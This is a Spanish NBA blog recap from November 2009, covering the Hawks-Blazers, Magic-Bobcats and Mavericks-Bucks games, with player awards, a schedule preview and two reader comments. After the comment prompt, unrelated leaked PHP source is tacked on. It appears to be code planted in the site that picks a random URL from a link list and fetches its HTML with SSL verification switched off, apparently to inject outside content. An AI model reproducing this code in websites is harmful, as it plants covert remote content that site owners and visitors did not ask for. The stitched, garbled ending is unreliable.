La Crónica (16/11/2009)

17 de November de 2009 por TheDeerHunter

Espectacular mini-jornada la de anoche. 2 partidos resueltos por prórroga y otro igualadísimo.

Los Blazers llegaban a Atlanta tras una excelente racha de 6 victorias. Por su parte, los Hawks los recibían invictos en el Phillips Arena tras haberles batido ya esta misma temporada el día 3 de noviembre. No fueron suficientes los dos buzzer-beaters que anotó Rudy, uno de ellos para empatar antes del tiempo extra y es que llama poderosamente la atención que McMillan preparara una última jugada para alguien que no fuera Roy. Josh Smith y Horford dominaron ambos tableros mientras Joe Johnson les acribillaba desde todos las posiciones posibles (casi literal). El juego interior y las pérdidas fueron decisivas para la derrota de Portland.

En Orlando, volvían Rashard Lewis, Ryan Anderson, Brandon Bass… y debutaba Stephen Jackson por parte de los Bobcats. El partido fue todo un despiporre ofensivo para el viejo Larry Brown, pasando ambos equipos de 90 puntos (incluso el suyo propio!!). El choque fue igualadísimo, resolviéndose con un triplazo extraordinario de Vince a menos de un minuto del final. De todas formas, con tanta táctica sesuda puesta en liza, tanto gran jugador en pista, el partido se decantó a favor de quien estuvo menos zote lanzando libres y perdiendo balones.Los aficionados de los Bucks siguen en una nube. Ayer no habían superado todavía la resaca del partidazo de Jennings frente a los Warriors que “tuvieron” que ver como su rookie la volvía a armar, esta vez delante de Jason Kidd. Fue un choque de poder a poder (¿quién se lo iba a decir a Milwaukee?) que tuvo que resolver Nowitzki con un tiro de potrísima al final del tiempo extra.

En noticias de actualidad, parece ser que Iverson y los Grizzlies han terminado rescindiendo su contrato. Veremos si se trata del final de todo este feo asunto.

PREMIOS

MVP: La pareja Kidd-Nowitzki ha tenido que exprimirse al máximo para vencer a los sorprendentes Bucks. El base se ha quedado a las puertas del triple-doble con 9 puntos, 10 rebotes y 17 asistencias. El alemán se ha ido a los 32 puntos y 11 rebotes y canasta ganadora en el último segundo. Tan solo un jugador podría discutirles el galardón y es el líder de los Hawks, Joe Johnson: 35 puntos, 9 asistencias.

Rookie: Brandon “Suma y sigue” Jennings. 25 puntos, 7 rebotes y 8 asistencias frente a una autoridad como Jason Kidd. Muy bueno tendrá que ser Blake Griffin y muy bien tendrá que hacerlo para robarle el RoY.

Sorpresa: Llega Stephen Jackson a los Bobcats pero el que se dispara es “Flip” Murray con 31 puntos. Buen partido también del denostado Luke Ridnour que, compartiendo muchos minutos en pista con Jennings, ha conseguido 17 puntos y 6 asistencias. Y partidazo de Rudy Fernández: 19 puntos, 4 rebotes, 4 robos y un auténtico triplazo para llevar el partido a la prórroga donde, nuevamente, Rudy dio el callo con 2 triples más.

Decepción: Brillante cambio de cromos el que hicieron los Bobcats este verano. Dejaron marchar a Okafor y se han traído a una abuelita reumática que dice ser Tyson Chandler. Claro que en los Bobcats no hay un Chris Paul que le surta de balones…

Esfuerzo en vano: Tanto el de Brandon Jennings como el de “Flip” Murray. Debe dar una rabia…

RAZONES PARA TRASNOCHAR

La madrugada del martes al miércoles nos traerá 8 partidos. Lo más interesante, a priori, llegará a última hora (4h30) con todo un clásico, la visita de los Pistons al Staples ante unos Lakers que necesitan ganar tras dos derrotas seguidas. Pero la jornada se abrirá a la 1h00 con el más que probable destrozo que LeBron James le hará a la porosa defensa de los Warriors. Media hora después, Wade y sus Heat recibirán a Durant y sus Thunder. Destacamos por último el Raptors-Nuggets que tendrá lugar a partir de las 3h00 en el Pepsi Center.

VIDEO

Las 5 mejores jugadas de la noche, con las canastas decisivas de Dirk y Rudy incluídas…

Comenta

2 comentarios a esta entrada

  1. rojorob dice:
    #1

    Al leer la crónica me pareció un poco osado calificar de “potrísima” un tiro de Robin Hood. Pero visto el vídeo…POTRÍSIMA SE QUEDA CORTO!!!

      Citar

  2. TheDeerHunter dice:
    #2

    30 segundos de los 10 últimos… los que jugó André en la derrota de Portland.
    Vamos a ver… la situación es que Blake es intocable de 1 y de 2 y Rudy, Webster y André se reparten los minutos que el primero les deje.
    ¿Es esto una genialidad de McMillan?? ¿Nos estamos volviendo locos ya de que nos encanten las capulladas de este tipo por ganar a Minesota, Memphis, Charlotte, Hornets y demás bandas???
    Con el pedazo de equipo que tiene…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>